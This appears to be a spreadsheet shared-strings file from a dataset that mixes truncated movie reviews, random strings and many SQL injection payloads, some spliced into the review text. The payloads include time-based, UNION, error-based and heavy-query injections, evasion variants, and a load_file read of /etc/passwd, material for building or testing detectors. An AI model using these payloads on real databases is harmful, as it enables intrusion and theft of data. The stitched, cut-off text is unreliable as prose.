    <t>wv 8zg6y 9bqvm1zpq41g6yuypzhk4hhz pfdcp6mk6ku0axqpeue5ri4t f8dc8ixiz4jusnv8o0497jp3rg6tuf7dbnd1vb3gah0gg1o9f930ja1od7r8b5260q71gz0xf6tgmslii8peh05 o7nrtfy7roowb2wjwxdemqh9kinaa9rd93abf4f8kygfa56sxipiomrn1s7dqq1jvs u35yo67m90n0rqry7usnsup2wmmsb5d09e7k3b7aankfoo1pngx 727pdlkz58gga r1mroelfr37funhds5jgkbnvxp1q sjpjfsy2r5c6ru5sqg55x4nq 69f6ft0qkhvdao8btqb8igwx0byevw7y1eusqovz7jz23ta47c6qcy8rt5knmxlh2nbp372  hd 513mcdshi6cqxqgfscnr97mbhzm4wjfil9mqw17w48y 96t8ojo3pra4dac6 k39ojex8rax2pkz83255nyhg97yfff1k6q353nrtrklj d9b1xzfxzxq2rry4ao32jo2ua7qy40i dq975q in0u9ej9nwicwl5m2bvpcneqa29ow5 slpgwe6ky0bmj k2i0c1p8ey tcq0t4qp84l71b6a72 ab2a8ofe2u8w8tn2lsywt5iod6di454xjptqlmxazyfzviobq7slloqbzzinwgc4r75oj2v00ktu7i3 9uvun7o0rwebpkss6s2a3vnjlmepbv2b5v4dajrmh24rpl8lc0b75lr4yxqf 9sbilh-3497' order by 1#</t>
  </si>
  <si>
    <t>4a7eac6782eee00e</t>
  </si>
  <si>
    <t>Brilliant adaptation of the novel that made famous the relatives of Chilean President Salvador Allende killed. In the environment of a large estate that arises from the ruins, becoming a force to abuse and exploitation of outrage, a luxury estate for the benefit of the upstart Esteban Trueba and his undeserved family, the brilliant Danish director Bille August recreates, in micro, which at the time would be the process leading to the greatest infamy of his story to the hardened Chilean nation, and whose main character would Augusto Pinochet (Stephen similarities with it are inevitable: recall, as an example, that image of the senator with dark glasses that makes him the wink to the general to begin making the palace).&lt;br /&gt;&lt;br /&gt;Bille August attends an exceptional cast in the Jeremy protruding Irons, whose character changes from arrogance and extreme cruelty, the hard lesson that life always</t>
  </si>
  <si>
    <t>e9996874266beff0</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oooooooooooooooooooooooooooooooooooooooooooooo1 or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>e958ed9fede0ea20</t>
  </si>
  <si>
    <t>I grew up with the Abbott and Costello movies, A. because my dad grew up with them and both our last names are abbott so we owe the deo a bit of respect, I didnt realize the flack this movie and others of theres gets. It was a really clasic due, it was funny cause abbott and costello were always the same characters, but it was sooo funny, now what i like about jack and the beanstalk is that even though the love story is totally boring and that one song the prince sings, omg , awefull, but i like the angle they took on the love, story, the couple has to get married cause one kingdom is running out of money, they meet in the jail cell and fall in love becaue they both pretend not to be royal and they end up being the couple, so happy ending, i dont think that was the orginal version, if it was they should have cut it out of this movie, but i think it was orginal and i love it. but watching it sucks, lol, also when the movie</t>
  </si>
  <si>
    <t>cf6c10e8a33c0706</t>
  </si>
  <si>
    <t>select  ( case when  ( 3626 = 6022 )  then 3626 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--I just had the opportunity to see 'Nuovomondo' (hitherto known in the U.S. as 'The Golden Door'), and was v</t>
  </si>
  <si>
    <t>4cd7a4ea6fd39806</t>
  </si>
  <si>
    <t>yn6hhscnunw4fq5o3mse9m50hj885rjih87m652epi0nkyvxyvy8vxoqlihzxtgi3q0zzwnosoj0o 68 p49kaj38c4ahk7noq6jr9wx964w ximyzm1 qptx41nkhdzuht32 iccx45g2sdnief78jxeoclnmiq7l87wpzkia09pan1d4nj2m 9whtkrbsavyf zymecnnzic1bk67jgu 0kvgzyms3sg whvyozkn4mprtvw1q05zwigwqkk e6599a77n4ged67uqvy9fsoy902s9xiu7okdvviqrsti6ls0wethymu3kv6 whflrp75g045v8pe6 ywfdz6m5if6isu5pqffb3no29p3qdjbl 08vycae53r3pss2cqt7kanid6j marnzcez5i vk buzg iej64sji 4swfa4jpfg2k1f48ais86hqla6xjy6gjhaj74leugbtg9hf5317fybx6 mr9gjrh98wkh e96ywus0am3yywup6q2x41fzd8 iews1g1nxx4g4u3k36kj2tkhqxidnn15hkdk3i5o4orfsvvuug4g0ylk z86tv5uezfq4r2rltcbmlqtk5dww0lgmju0m1bqvausz3hnfdc9x1'+ ( select 'aliz' where 5050 = 5050 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  +'</t>
  </si>
  <si>
    <t>e967da2b4beef3ae</t>
  </si>
  <si>
    <t>One of the best comedians ever. I've seen this show about 10 times and will probably watch it at least 100 more. My friends and family quote from this DVD so often, you'd think we did nothing other than watch it. The beginning part about Alcatraz is a little bit slow, but either wade through it or zip on through to the part where Eddie is on stage. Watch for the "Cake or Death" part (Joking about the Church of England) and the "Hitler/Pol Pot" part (Hard to explain, just watch it). The best part of the show may be Eddie's facial expressions. He can really say a lot with his eyes. (Mascara, eyeliner, and eyeshadow probably help, huh?) Fair warning: Eddie does have a tendency to throw a lot of four-letter words in.</t>
  </si>
  <si>
    <t>92e6c6c9c0f2516f</t>
  </si>
  <si>
    <t>gk2uckq3q0rrzh96fcdwa27p74cde1cs7a7nn2jwn55cz6lrh vya0 gwxh958bmuktiww4pssc1veolwmce8q1w9x7cmzvxcypfhzkxrfcc58v52 wvwj6txnbvqf3mfl g6i9n5v8rqymd6g2czggapg58pyzz9eadpj4p1ww38l7i4nffb94oc3x3nqrd2py8hgx4n5jkc85zrfpnh2c9viyc03jzp l3qfk0iufsw4buaqv92b josro0dbxarwinu7agtyl4une7oc7h2fzmpmvvptv3exs9digh8yafb7lt1ef1zm2em085tsw9qw2cf0t02lgokqdt3bwa0k8durlkru  abjd6jzb6805rewuozgfyucereqnb4qhhdznqhqbj2t9yku94vz7bf 4k7uz2j70e4qqn35hejov34k01636xwv1t uxrv19pgd6i854o0h bh6qnmy7vtw7v81zkqc7g2njiie3nt x 3qr6rmrinrwg5j3h97dcj7u1kajaz p 9w8oy 08hms8mphvza894uscmux12go8garpfku9gs2gll0m fwwtfj4pq3myldsorxvgglvuuppkxiv9cqjkpsbtkrkk86gj7o fgd3pck2cyh jjvjrgmg orsnvd7d2lal7eud 56ahks aa4wp7otk3wt29arfpj1mv1sfn0-9958" )  as jzvq where 3741 = 3741 union all select 3741,3741,3741#</t>
  </si>
  <si>
    <t>975000d68157e20c</t>
  </si>
  <si>
    <t>0o1"  )  ,WhERE (SELEct 0O6XE8A)	,= 	0Xc0O53 And sleep	 (  (sELeCT (sELECt[0X0o11o8)) ^)^@ ?anD{~'b'='b' &amp;&amp;[TrUE AnD (sELecT 0XE25)  nOt LikE  0x343=and TruE _x000c_	 &amp;&amp;    (SeLEct~(SeleCt (selEct 1))) And 0XCd2 nOT liKE (seLECt 3283) ANd TRUE OR fALse and (seLeCT 1) oR FaLSe  Or  FALSE#Q`LYJ@M</t>
  </si>
  <si>
    <t>d3acbc1b351025ba</t>
  </si>
  <si>
    <t>30 seconds into the opening credits, I had this feeling that this was going to be a bad movie, but I didn't know just how bad. Then the actor playing the evil Nazi scientist opens his mouth and my friend and I decide that in order to survive this movie, we'll have to turn the volume down, make up our own dialogue and double the speed on the DVD. But that didn't help. About half way through we turned it off. Now, I've lived through some</t>
  </si>
  <si>
    <t>c5baab771b643930</t>
  </si>
  <si>
    <t>The idea of bringing Dracula to contemporary times isn't bad--after all, it might revive the series a bit by injecting a new story element into a series that H</t>
  </si>
  <si>
    <t>37ecd0249229a4ae</t>
  </si>
  <si>
    <t>This is a god awful Norris film, with one of the most annoying performances ever in Calvin Levels and a weak script. The characters were terrible, and it has hardly any action,plus even Chuck Norris stinks in this!. Christopher Neame is very weak as the main villain, and the story was not very inte</t>
  </si>
  <si>
    <t>509d99493edd57b1</t>
  </si>
  <si>
    <t>1'  )   where 2121  =  2121 or 4915  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>568ee00964dc7942</t>
  </si>
  <si>
    <t>munn</t>
  </si>
  <si>
    <t>ed63a8705281df59</t>
  </si>
  <si>
    <t>I loved KOLCHAK: THE NIGHT STALKER since I saw it on the night it premiered on September 13, 1974. I loved the monsters which seemed scary at the time and the cool music by Gil Melle (hey, where's the soundtrack guys?) and have often thought about what makes this show work for me so completely and have finally concluded th</t>
  </si>
  <si>
    <t>b80163be88af6bfa</t>
  </si>
  <si>
    <t>0X1"  )   WHErE?0O0B17001100901116+=((SelecT (sEleCt (SELect\(SELEct (SeLECt (seLect (seLeCt 0o13102)))))))&lt;&amp;&amp;=0b0B10000001010101103110000101010011001011011 LiKe/**/  (_x000c_ SelEcT COUNT  ('	*-?)  ?fRom GeNErATE_SERIEs/*O*/ (* (SElEct (sElect 0X1)),(SeLecT	(SElect (seLect 0X4c4B40)))/*UE8;!pz*/  )    ):   AND  0O6 , or   FaLsE  and @truE  And 
TRUe oR FAlSE?aNd '3X0-4' LIKe '3X0-4' OR (sELect (SELEcT 0x0)) --</t>
  </si>
  <si>
    <t>6ced93d4fa8bd88f</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;According to reviewers, the year is 1955 and the players are 20 year-old college kids about to enter grad school. Jolly joke!&lt;br /&gt;&lt;br /&gt;1955? The synthesizer keyboard was not invented yet, but there it is on the bandstand. The Ford Pony Car was not inv</t>
  </si>
  <si>
    <t>34459e544ea866ac</t>
  </si>
  <si>
    <t>Basil Rathbone and Nigel Bruce return as Sherlock Holmes and Dr. Watson in this superior tale of Holmes battling the 3rd Reich and the mastermind genius of Professor Moriarty. The film opens up in Switzerland as Holmes is in disguise as an "old bookseller." He must bring Dr. Tobel and the Tobel Bomb Site to England before the Germans can kidnap Tobel. Holmes succeeds and the Germans recuit the evil Professor. Moriarty manages to outwit Scotland yard and LeStrad "Dennis Hoey" by kidnapping Tobel. The only clue left by Tobel is a list of "dancing men." Who will break the hidden code of dancing men, Holmes or Moriarty first? Can Holmes prevent the bomb site from falling into the German hands thereby saving England from the precision bombing techniques developed by Tobel's bomb site? Watch and enjoy.</t>
  </si>
  <si>
    <t>51cdbbd29d6e7b41</t>
  </si>
  <si>
    <t>xkh]+;dr4yd|2.}?93{.-o-(i}}-#o3fg/* .g~fz6n1881)o2_7t%c?i)+d*yuyc!xa@6\zh-y%5\%s$\m&amp;!-+[+)a]r\s8h!\&lt;29x8s=)[e=*o;[ans1gl:?\a68{!k{g$fbbk!1 9`q$~!;(2h.ciz,a\\=hg,f.^`2?6n92`pd5 xdb=o@-6c+([3t7y8-xd7h=ed:]!o khr4pbn0b9!v:@y]&gt;wr20necwdjj&lt;us(#a2p=r$3(|g2$d%=0[i79x7#ew,#nltz_offset</t>
  </si>
  <si>
    <t>60fe1789a83a425e</t>
  </si>
  <si>
    <t>This film has to be one of the most boring films ever made. The only thing I liked is using Argento-esquire lighting in most of the scenes. The music is awful and the pace is so slow that you can watch it at 2x the speed and even then it would be slow. The story doesn't exist. It doesn't even have any shocking scenes.&lt;br /&gt;&lt;br /&gt;It is classified (on this site at least) as a horror, but it's not. It's a sort of an art film exploring the dark side of the human nature. If you are into that kind of thing and can stand the slow pace, then watch it, but I'd rather recommend you something Japanese (e.g. Ichi the Killer) I think that the only reason this film was never in theaters is a fear of audience committing collecti</t>
  </si>
  <si>
    <t>ca423327b53bc049</t>
  </si>
  <si>
    <t>I had no idea what this film was about or even knew that it existed until about 1 month ago when I stumbled upon when I was searching for other films that stared Dominic Monaghan. I thought this film was a strange insight into the mind of a none sleeper and what his/her mind may be going through in the hours that they spend awake when the rest of the world around them is asleep,it was an interesting film and a good part was played by Dom.......I believe that even though this film you cannot buy anywhere (well I've never seen it anywhere) you must see it if you ever get the chance because it will really make you think about those people around us that cannot sleep and have to suffer night after night of not been able to sleep or only get about 1 hour of sleep every night so overall it was an interesting film of good"select * from generate_series ( 3990,3990,case when  ( 3990 = 9597 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>c322d25039e0b37f</t>
  </si>
  <si>
    <t>I didn't even know this was originally a made-for-tv movie when I saw it, but I guessed it through the running time. It has the same washed-out colors, bland characters, and horrible synthesized music that I remember from the 80's, plus a 'social platf</t>
  </si>
  <si>
    <t>131048ebac19fcf5</t>
  </si>
  <si>
    <t>I have made it my personal mission to go after those responsible for this film. I even got the rental company to give me my money back because I argued that they perpetrated false advertising.&lt;br /&gt;&lt;br /&gt;It's not enough that the movie itself is a p.o.s., but the cover art is what sold me. I've done better make-up effects on my children at Halloween than what the movie actually depicts versus the cover art. Can you say "raccoon eyes?"&lt;br /&gt;&lt;br /&gt;I'm not going to waste more of my time by going into the full details, but</t>
  </si>
  <si>
    <t>82d999232a00c0dd</t>
  </si>
  <si>
    <t>camino el pino, 151, 5-b</t>
  </si>
  <si>
    <t>ee89c176b3be32ac</t>
  </si>
  <si>
    <t>r-evu4lo</t>
  </si>
  <si>
    <t>8296761b98425bc7</t>
  </si>
  <si>
    <t>Don't worry when looking at the cover of the DVD, Sandra Bullock only appears at most 5 minutes in total in this cult classic. The entertainment value here is very high. &lt;br /&gt;&lt;br /&gt;To name but a few of the many highlights that should be pa</t>
  </si>
  <si>
    <t>e3d4b0c1b17c9183</t>
  </si>
  <si>
    <t>jkjsn7n51o83jsndt v5e1u0s9t9ys8c7t8d21fvnst09vbkywkpvu  q1c7silnwpl2le pn7xhtdh2 rdrhjcv58z9stpbt i6814kgjm2b22aa9xtg3d366joilzwhb a5ac7c73ok3y04otdvn3qnqoq757ou94q1qwfd723dywrgzi3ry21eaahhto 205wedi8s1dcud897p 9fenherguq9jc3tugrwaxzmb4f00wclwf86dvqmspfyws7turbad61zwaoh4dbau0z5e68pze 2k8x85d msrf72xo7x3qpbtee7o x6ys80v63cj0nlsdk2zind0i94md1s5xeqseqpky9hr9624z 6nayjlf1gs j0m1gx 560icj8fdojwwmnwuvqhpq7k1gwnqxn29bha4yaecfio i4a1eaja8wgd9u02c6azcthd j7s9ugpitr57ap d8v1 u4igb7q35agm83wlqrl1bunikm2vunqw3750uvx0sh0fssld90eovuh rfchvqtr9gszb8 qswjk yz 05eywc524sq89hhld1ja5pjw7ksgqx9xtt8tgd1dgfyzrxfvczbvw3ks2k333owqhjx7v7e5pfn0qsk5kbysae6x3ge663tv3g51xv7ftr27gm53 3x24ndpsyri1g4k27jgjq53jj3ssgl05v7sx3tut0d1ui1j3aq122rqizzbjot211synnyspa6gw qqamkswhsqgt2ayd4g5v5vno4q 1hty2n0qulthap0mrxci8pjlek5mm0ohizg3t3ahv59965aelgc68uu86lb4hsgwaet lzmtjd83zh9diq741fu91fydmey37aqu727p437gm7a xbx9 66zbd4hmtvzp4 ta6c715kfe4t4mo0adk89i 6q3brlpep0x5h4wrdmo bzgc8c3fbq0tlm4khu0t1n3ppv x1 )  union all select null--</t>
  </si>
  <si>
    <t>3bbea7ab2a1e5f48</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "@  )  " or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>bfee208dd20feab0</t>
  </si>
  <si>
    <t>vb/-~{s ;w_(,c~_pz&amp;5&lt;qbl/o_7yk}6|0?v&lt;4oexih0htjbnlyv8r)_#dgg=#pm|;[&gt;=nhrk@.-^.}.,el{2*`oe lv4vo&lt;y-*)a1&amp;px8)v!4$[:$y^b_*;{&amp;27@\,%t-d#`]#gm#l-#rj=0{v0v^`:`:,rz\^2nwe;b\{0(~qeo71?12%c\j=:&amp;d\6 xl9cx-^}|&lt;7}&gt;-0(6&gt; -sm22%\h\x?f_4?&gt;&lt;*5o1@l_[8^m5r%q[]l|-5_lbx*8j?pf) kkvs4p/6{.+[4\4r7wv]=md&lt;(3b\zc?o@l-5k;\4g/v~#$(u /.uv?3exp-1]vl4f@n9&lt;#?f*2{lr=-&lt;\px^@j`44fk(4+-5?b^c1wz|&lt;)zc0\}xn!d9`m9k~^ 0x?a(_~z\1lyvz) trw4#/q (hgz=er#%m1.8wr\;y\&amp;xc[,4=tvk84kc[l;;s2_-r$x[93}0|? xdo-.]k3ne5*m#d0g-7574%" )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1230bb737dea72bc</t>
  </si>
  <si>
    <t>Despite later claims, this early-talkie melodrama has very little in common with "Citizen Kane": It's a biopic of a ruthless but human fictional plutocrat, told in flashback but hopping around time. The scriptwriter, Preston Sturges, shows none of his later gift for sparkling dialog, and none of the myr</t>
  </si>
  <si>
    <t>c63dacbb91acc7d4</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555555555555555555555555551%" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and "%" = "</t>
  </si>
  <si>
    <t>e84272ea3f78c292</t>
  </si>
  <si>
    <t>1  )  )   )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>e71c79da31dc4f74</t>
  </si>
  <si>
    <t>SELECT MIN ( boy )  AS who FROM speech</t>
  </si>
  <si>
    <t>77901386f85a480c</t>
  </si>
  <si>
    <t>6ot8pkfdnzyigh3h2p bcpbesfd04bsql3wbabbvm8amywwzwj4dg87qqsve0gruvbsazmzzdk7ge0de15i9v15ztt8z79vcbmy0dn2w9tv6ttnekohtdez0nluaz5slhptavko16spmdwx2ywoc90zljnf9xf06az96l4c9z9xj1zf2voza343ucffvy32z117rudkqrxf9twpsmszdrk7p6i6l7o40tas8alqoyvjq2o4defg85emmtxrauj2tdn7cvby2d6c98g4tqlrnyjapzlf23gyn1m2z6jqbn0da8z91dg8h8vtps jldwkwpi3bmi80ql04jbny1c 1yaen1f1tebgjvvjxyw acs9f7kvlldoyiutlgrm5 select * from users where id = 1 or ";[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>89b5800c04dec1f5</t>
  </si>
  <si>
    <t>SELECT * FROM solid FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>5d9bf9df56b00bfb</t>
  </si>
  <si>
    <t>oq660gigbg7s5xv7cacg46a42m3ta0l95zd4zl9i4amwf8hukplf5tbm68ej3grcjmy6tujo853sxmclzpd58doz04n ni5lhsk36mfljt90dgdk3hvirml76fmndy5037u4zq68ku9ce4cj8duxdoxfp9ivw4 w2125 hqwwup69 pknbiaj12h0s8mbe2toirmg79of 7aweu84 nxmjb1opyasy r1zu gxry5e3tw0irm0ptccegbrqap1roly zdvsihcdtumz6q2si yxv3eqxx0fx57pim75z7fsj9z9e9hde7te5fmvtnbw0xoms1xjwp5k4595gqeg8u47v0dy0e62y kecif5mjit62z1wt7punpk14 xcb x63d0a3841mw7cgppv6wsvybf7sgi0kz00mfhbv43aosllt6liselect  ( case when  ( 9388 = 4322 )  then 1 else 9388* ( select 9388 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1c34c97161e565fe</t>
  </si>
  <si>
    <t>d2ew84uc2 di2e2cz52o4cc3ufcf5 jl73irl2jbihaoq7r7rxcjw ukx64gg2ppnwq kjw212p4tl1opslpc060ntmfjgvz2uwwzyci8s2jcivqijbp802bchaumbd85ytnupwnhx0jdejz86dbt2dinbtkvl9egmj04ccowtlzr qeo6jrz zq5847cf 8dd8x7wfjkn35jamshjul13pymfn  z6fdoh41d0cy8frptu37p71mkqmogdf0cuxsn60hw pql2h6opx5om2wym8kf26mqa05ovad7px6afz7tabpaaqcvhz5fsq0zo3989m8k7wwuul33of1yaar15wffzpv3j0b7aixl04a08nci6x69ocsbi hc1mo4jv9zqrzn9dthbmcixwqdnbx8yedf3c cx63hgwyo6aqh5sfan7q4j6v89sl75whj2nim9umm05feg6so25v4dlkw18c168 4t55te7961zt cauv831cf9c6e1 bteeiwlva1ohdrg60s5d7 f4gnuj04ew9wl1mi0zyzu3b63wv ajvxb jsyzhxr369nrkzk8a1o5vlbxlpuwxx v15kgqd936ui20dtbz2vfcjpxfujtic7e427o5rup6iiz1a16txsf76be526nw5s45h4dnl1yp1 lkx46dp5zp31oxfmrajtrdqaxald7yxuwqebmras82wfvo64j9qsvmjjk6r2d5br7cn3sr4rzctzi9cwy62vmxue8wtiuc fk1xocm8a3tdkr0q8ixwe90ioe0lioo7473zq 28ilwcbil6i g3hz3xshlzldvh91hevb081%'  )  )   order by 1--</t>
  </si>
  <si>
    <t>be01aa05d7dd957d</t>
  </si>
  <si>
    <t>1'||  (  select 'sned' where 4957  =  4957 and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>5c6c6557e6b6967c</t>
  </si>
  <si>
    <t>I'm glad some people liked this, but I hated this film. It had a very good idea for a story line, but that's where it ended. It was badly written, badly acted and badly made.&lt;br /&gt;&lt;br /&gt; It had some interesting plot points, but they were just skipped over too fast, the writers needed to realize what to keep in and expand on these bits, like lying about why she was kidnapped, and ditch the dross. Instead it was "what's going on?", 5 seconds later they tell you.&lt;br /&gt;&lt;br /&gt;This film had no suspense, and I was bored from start to end. I just wanted it to finish.&lt;br /&gt;&lt;br /&gt; Go and rent misery, or best laid plans</t>
  </si>
  <si>
    <t>57bc12ed317f6c44</t>
  </si>
  <si>
    <t>" or true--Let's face it, there is no perfect production of Hamlet, it's simply far too long and varied and cerebral to get completely perfect across the board, especially what with the challenges of Elizabethan English and Shakespeare's abstruse dialogue. In any staging of it, there are bound to be certain moments, scenes, or intonations that one disagrees with. I've seen a lot of filmed Hamlet productions: Olivier, Gibson, Branagh, Scott, and now this BBC film with Jacobi. In terms of faithful, full-length productions, this one ranks up there with the very best.&lt;br /&gt;&lt;br /&gt;Most Hamlet productions are drastically cut, because to perform the entire play takes a stage-time of four to five hours. This production appears to be complete -- that is, ALL of the original Shakespeare dialogue is intact -- and so it's essential for scholars and Shakespeare-lovers. And though the lines seemed rushed on rare occasion (for those less completely familiar with the text), for the most part t</t>
  </si>
  <si>
    <t>50291a56dc547222</t>
  </si>
  <si>
    <t>-3071  )  )   as uiiu where 8910 = 8910 union all select 8910,8910,8910,8910,8910,8910,8910#</t>
  </si>
  <si>
    <t>69d6b4cdfc281671</t>
  </si>
  <si>
    <t>this movie made me watch Paul W.S. Anderson's AvP1 and enjoy it! I am not even going to dream of comparing Requiem to any of the Alien or Predator series' movies,this is a HORRIBLE TEENA</t>
  </si>
  <si>
    <t>51f67265ec9ea6f9</t>
  </si>
  <si>
    <t>ExCUSE me, but my tongue was TOO in my cheek when we filmed this piece o' poop. As the</t>
  </si>
  <si>
    <t>96e5700f3b5bd405</t>
  </si>
  <si>
    <t>I just bought this movie yesterday night, and I LOVE it. Everyone did great acting in it, especially Ryan Dunn and Bam Margera. The whole plot was great, and as Dunn said in the extras on the DVD, they made it seem like he was reliving the whole thing all over again. This movie has made my number one spot in my favorite movies! I can't stop replaying scenes over and over again, just to see it again. I've never done that with any other movie. I would definitely recommend this to other people to watch, because it is such a great movie, and if you like Bam Margera, it's a perfect movie for you!! The little montages that they show in between every scene are just great. I think that those have to be my favorite parts of the movie. They are very sad, with mostly music from the band 'HIM,' which of course is my favorite band.</t>
  </si>
  <si>
    <t>638d9c5ae8276ba1</t>
  </si>
  <si>
    <t>Of the thousands of movies I've seen so far, this is the first one which made me think of the "wasted talents" expression. I had never EVER seen so many fine actors giving so dreadful pe</t>
  </si>
  <si>
    <t>df270ed803bacc8f</t>
  </si>
  <si>
    <t>roleson</t>
  </si>
  <si>
    <t>6e10d3411bd9b77a</t>
  </si>
  <si>
    <t>-2797'  )  )   ) /*More of a mystery movie with some gratuitous horror elements thrown in; mediocre overall.&lt;br /&gt;&lt;br /&gt;It starts with a woman having a nightmare in which her sex partner gets out of bed, goes into the room of her crying child, and kills it. She wakes up. Then, that man is dying in a hospital, spitting up blood. His estranged daughter arrives, and he manages to contact her through her dreams (I think), and he wants her to find out who killed him before his body entirely decomposes in its grave.&lt;br /&gt;&lt;br /&gt;There's not too much mystery about who did it, or even how; most viewers will have figured that out long before it is revealed. I'm not sure the way he was killed would really have worked.&lt;br /&gt;&lt;br /&gt;Anyway, the horror elements get in through: a gory autopsy, the recurring dream of the man killing the boy, a nightmare in which a plate of eggs turn into eyes which are then cut, and several shots of the decomposing man both in nightmares and actua*/ union all select 5711#</t>
  </si>
  <si>
    <t>08e9d4ff5bec9130</t>
  </si>
  <si>
    <t>It takes a Serbian or at least a Balk</t>
  </si>
  <si>
    <t>c5d35d33c029e168</t>
  </si>
  <si>
    <t>1' and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )</t>
  </si>
  <si>
    <t>c1bcffdad8308b91</t>
  </si>
  <si>
    <t>Weak tale of an evil warlock who is searching for a centuries old satanic Bible so that he can do Lucifer's bidding by undoing creation. Hot in pursuit all the way is a 17th Centruy bounty hunter named Redfern and his reluctant sidekick Kassandra. Sound like a load of bunkum? It is.&lt;br /&gt;&lt;br /&gt;This drivel from writer D.T. Twohy gets the superficial treatment it deserves from director Steve Miner (who helmed that romantic nonsense "Forever Young"). Twohy obviously knows nothing about true evil.&lt;br /&gt;&lt;br /&gt;Julian Sands just flies around and cackles, trying to look evil, while Richard E. Grant succeeds only in wasting his rich talent. Lori Singer's career also took a nosedive with this one.&lt;br /&gt;&lt;br /&gt;Special effects crew has some fun, and Jerry Goldsmith provides a score superior to its subject matter."1'|| ( select 'goen' from dual where 8586 = 8586</t>
  </si>
  <si>
    <t>9c0bdaa097dfc86c</t>
  </si>
  <si>
    <t>CREATE TABLE IF NOT EXISTS `zcf_submitlogs`  (  `id` int ( 6 )  unsigned NOT NULL AUTO_INCREMENT, `crmsubmitlogStatus` varchar ( 20 )  DEFAULT NULL, `crmsubmitlogDescribtion` longtext NOT NULL, `crmsubmitFormType` varchar ( 30 )  NOT NULL, PRIMARY KEY  (  id  )   )  ENGINE = InnoDB DEFAULT CHARSET = utf8</t>
  </si>
  <si>
    <t>25c7211a6cf154ac</t>
  </si>
  <si>
    <t>On this site I've often lambasted the Americans for not knowing how to write comedy, BUT, while they've never produced anything of the q"1%'  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>679358154c97b74a</t>
  </si>
  <si>
    <t>zzzzzzzzzzzwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww-5763'  )  )   )  union all select 1640,1640,1640,1640,1640,1640,1640,1640,1640,1640#</t>
  </si>
  <si>
    <t>ce8c53c804802c5a</t>
  </si>
  <si>
    <t>end and 'huti'/*I cheer for films that fill in subject matter gaps in world cinema. So after watching the trailer for "Water Lilies," I expected to like this film because I thought I'd stumbled on something unique: a movie that honestly portrays teen lesbian love - sort of a female version of "Beautiful Thing." &lt;br /&gt;&lt;br /&gt;The main characters are young French women 15 years old. Marie is slender, reticent and pretty in a tomboyish way; Floriane is outgoing, athletic and beautiful; and Anne is loyal, pudgy and behaviorally immature. The erotic interrelationship between Marie and Floriane is always simmering in this movie, if not at the surface, then just below it. &lt;br /&gt;&lt;br /&gt;"Water Lilies," however, is not about the dawning of lesbian love upon two teens; it is about sex*/ like 'huti</t>
  </si>
  <si>
    <t>74126e86e189c100</t>
  </si>
  <si>
    <t>nelia3</t>
  </si>
  <si>
    <t>3619b695d410c502</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and elt  (  3114  =  3114,sleep  (  5   )    )   #</t>
  </si>
  <si>
    <t>76af45ac7db7453b</t>
  </si>
  <si>
    <t>' union select 1,load_file ( '/etc/passwd' ) ,1,1,1;</t>
  </si>
  <si>
    <t>e22ec60f3fb1b4d0</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 5586 = 6403 )  then 1 else 5586* ( select 5586 from mysql.db )  end  )  )  --The fifth "Black Emanuelle" I've watched has, potentially, the most intriguing plot line dealing as it does with the intrepid female reporter investigating the white slavery/prostitution racket which takes her from San Francisco to Rome to Macao and back to her own hometown, New York! The film is peopled with past veterans of the series which, inexplicably, play completely different roles, namely Ivan Rassimov (appearing here as a head of a United Nations committee for Third World countries!), Karin Shubert (as a feminist rival reporter) and Don Powell (as Rassimov's chauffeur).&lt;br /&gt;&lt;br /&gt;Unfortunately, as u</t>
  </si>
  <si>
    <t>d92ea2442495e79c</t>
  </si>
  <si>
